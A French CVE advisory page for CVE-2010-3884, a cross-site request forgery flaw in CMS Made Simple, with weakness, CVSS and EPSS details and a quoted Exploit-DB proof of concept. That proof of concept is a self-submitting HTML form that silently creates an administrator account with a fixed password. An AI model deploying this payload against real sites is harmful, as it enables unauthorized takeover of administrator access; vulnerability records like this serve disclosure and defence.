CVE-2010-3884 : Détail

CVE-2010-3884

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.22%V3
Network
2010-10-08
20h00 +00:00
2024-09-16
19h25 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site request forgery (CSRF) vulnerability in CMS Made Simple 1.8.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that reset the administrative password. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 12009

Date de publication : 2010-04-01 22h00 +00:00
Auteur : pratul agrawal
EDB Vérifié : No

======================================================================= CMS Made Simple 1.7 CSRF Vulnerability ======================================================================= # Vulnerability found in- Admin module # email [email protected] # company aksitservices # Credit by Pratul Agrawal # Software CMS Made Simple 1.7 # Category CMS / Portals # Site p4ge http://server/demo/2/10/CMS_Made_Simple # Plateform php # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team) # Proof of concept # Targeted URL: http://sever/demo/2/10/CMS_Made_Simple Script to Add admin user through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post"> <input type=hidden name="sp_" value="64becc90"> <input type=hidden name="user" value="master"> <input type=hidden name="password" value="master"> <input type=hidden name="passwordagain" value="master"> <input type=hidden name="firstname" value="12345"> <input type=hidden name="lastname" value="12345"> <input type=hidden name="email" value="[email protected]"> <input type=hidden name="active" value="on"> <input type=hidden name="groups" value="1"> <input type=hidden name="g1" value="1"> <input type=hidden name="adduser" value="true"> </form> <script> document.csrf.submit(); </script> </body> </html> . .................................................................................................................. After execution just refresh the page and we can see that the admin user added automatically. #If you have any questions, comments, or concerns, feel free to contact me.

Products Mentioned

Configuraton 0

Cmsmadesimple>>Cms_made_simple >> Version To (including) 1.8.1

Références

http://secunia.com/advisories/40031
Tags : third-party-advisory, x_refsource_SECUNIA